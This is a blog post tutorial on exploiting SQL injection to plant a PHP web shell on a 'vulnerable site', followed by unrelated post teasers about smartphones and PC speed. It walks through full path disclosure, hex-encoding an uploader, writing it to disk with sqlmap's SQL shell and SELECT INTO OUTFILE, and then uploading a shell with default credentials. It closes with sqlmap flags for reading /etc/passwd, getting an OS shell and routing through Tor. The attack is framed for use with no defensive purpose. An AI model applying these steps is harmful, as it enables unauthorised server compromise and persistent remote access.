Upload shell with sql injection

what you need: ?
A PHP Shell ^
A upload script ^ (optional might work without)
sqlmap^ (optional but makes it so much easier)

what is a shell ?
Quote
Shell is a shell wrapped in a script. It's a tool you can use
to execute arbitrary shell-commands or browse the
filesystem on your remote webserver. This replaces, to a
degree, a normal telnet connection, and to a lesser degree a
SSH connectio.

You use it for administration and maintenance of your
website, which is often much easier to do if you can work
directly on the server. For example, you could use PHP Shell
to unpack and move big files around. All the normal
command line programs like ps, free, du, df, etc can be
used.
There are some limitations on what kind of programs you
can run. It won't do no good if you start a graphical
program like Firefox or even a console based one like vi. All
programs have to be strictly command line programs, and
they will have no chance of getting user input after they
have been launched.They probably also have to terminate
within 30 seconds, as this is the default time-limit imposed
unto all PHP scripts, to prevent them from running in an
infinite loop. Your ISP may have set this time-limit to
something else.
But you can rely on all the normal shell-functionality, like
pipes, output and input redirection, etc
source ^
so lets start
1. After finding a vulnerable site you need to get Full Path
Disclosure^
I will use the empty array exploit, add the brackets []
Code: [Select]
http://www.example.com/index.php?id[]=1
gives
Code: [Select]
Warning:  mysql_fetch_array(): supplied argument is not a valid MySQL result resource i
now we have the path
2. now you need to convert your upload script to hex ^
Code: [Select]
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uplo
becomes
Code: [Select]
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2
3. Now lets fire up sqlmap with a sql-shell and inject
Code: [Select]
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
let sqlmap do its magic and after a while you will get a sql-
shell
Quote
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q'
and press ENTER
sql-shell>
now write
SELECT 0x Your_Hex_Code INTO OUTFILE "Full_Path
+filename";
don't forget the 0x before your hex, so it soul look like
Code: [Select]
select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374
into "/home/relax/public_html/upload.php";
After a few seconds you should get a confirmation if it
was successful or not
4. browse to http://www.example.com/upload.php and
upload the php shell
5. browse to your php shell and login
Info:
The username and password for the shell is cyber,
gladiator, you can change this in the php file, this specific
shell must be named cyb3r-sh3ll.php or it will not work
Think about having a unique name for your upload file so you
don't overwrite some existing file, if you change name you
also need to change the source.
Extra:
You don't need to use sqlmap you can simply run the select
statement in your browser it requires a bit more work tho.
A theory is that you can inject the full shellcode directly
instead of first writing the uploader, the problems is that
this specific shell is 268kB but maybe with a smaller shell
sqlmap is really powerful tool you can do shitt load of stuff
with it here are some functions i find helpfull:
-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote
machine must be used with file-dest
--file-dest=/etc/passwd where to write the
file-write
--os-shell like the sql-shell but
system
--wizard for beginners
--check-waf Check for WAF/IPS/
IDS protection
there are many more just check them out
The --file-read/write does not work most of the times
maybe im doing something wrong thats why i use sql-shell
to write files or do specific commands.
--os-shell is awesome, you cant write php code to disk
tho.
well that was it i think, please share your thoughts/
concerns or my mistakes
Happy hunting 😎

Comments

Post a Comment

Popular posts from this blog

Reliance to Launch 4G Smartphones Under 'Lyf' Brand

Image
Reliance Retail, part of the  Reliance Industries  group, said Friday it will soon launch its own brand of 4G LTE smartphones under the brand Lyf. In an emailed statement, Reliance Retail said the brand is "built on the premise of unmatched user experience will offer high performance handsets that deliver a true 4G experience comparableto the best in the world." To that end, Reliance Retail said the Lyf range of smartphones will come with features like voice over LTE (VoLTE), voice over Wi-Fi (VoWi-FI), as well as HD voice and HD quality video calling. The company has earlier talked about  launching 4G smartphones at Rs. 4,000  and offering services at Rs. 300 per month. Apart from Reliance Retail, the Lyf brand of smartphones will be available through a wider distribution and retail network including multi-brand outlets. Earlier this month, Reliance Industries (which owns Reliance Jio Infocomm) and Reliance Communications announced  a partnership to trade an
Read more

How to Make Your Computer Faster – 10 Proven tips

Image
Proven tips to make your Computer or Laptop run faster. How to make your computer faster  is a question that may be bothering many of you struggling hard with slower machines. Computers/Laptops start to slow down as they get older and clogged up with files, unused software and other digital debris. Even laptops with the fastest processors can start to run slow over time. However, that doesn’t necessarily mean you need to replace your machine with a new one or hire a computer geek to  make your Laptop run faster . Thankfully, you can  speed up your machine nearly to its full speed a lot easier than you think with few easy maintenance steps or inexpensive upgrades. Here are 10 proven simple tips on how to make your computer or laptop run faster, some of which of course, have been suggested many times before by computer experts. 1. How to make your Computer faster – Check free space on hard disk As you use your computer and load programs, files, music, photos etc, the availa
Read more